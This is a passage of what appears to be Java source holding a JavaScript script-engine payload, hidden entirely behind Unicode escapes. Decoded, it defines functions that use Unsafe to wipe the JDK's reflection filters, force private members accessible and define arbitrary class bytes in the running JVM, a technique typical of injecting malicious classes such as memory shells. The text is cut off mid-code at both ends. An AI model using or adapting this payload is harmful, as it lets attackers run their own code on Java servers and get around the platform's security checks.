\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0
020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0064\u006b\u002e\u0069\u006e\u0074\u0065\u0072\u006e\u0061\u006c\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u007
3\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0072\u0065\
u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u002c\u0020\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0
046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u006
9\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\
u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0
020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u0042\u006f\u006f\u006c\u0065\u0061\u006e\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u002c\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u002c\u0020\u0074\u0072\u0075\u0065\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0079\u0074\u0065\u0073\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u005
c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u005c\u0022\u002e\u005c\u0022\u0029\u005b\u0030\u005d\u0020\u003e\u003d\u0020\u0031\u0031\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0079\u0070\u0061\u0073\
u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u005c\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u005b\u0042\u005c\u0022\u0029\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u7ed5\u8fc7\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0
073\u0073\u0069\u0062\u006c\u0065\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0065\u006c\u0073\u0065\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0050\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0043\u006f\u0064\u0065\u0053\u006f\u0075\u0072\u0063\u0065\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u006
3\u0065\u0072\u0074\u002e\u0043\u0065\u0072\u0074\u0069\u0066\u0069\u0063\u0061\u0074\u0065\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u002c\u0020\u006e\u0075\u006c\u006c\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u005b\u005d\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0065\u0072\u0072\u006f\u0072\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0066\u0069\u006e\u0061\u006c\u006c\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\
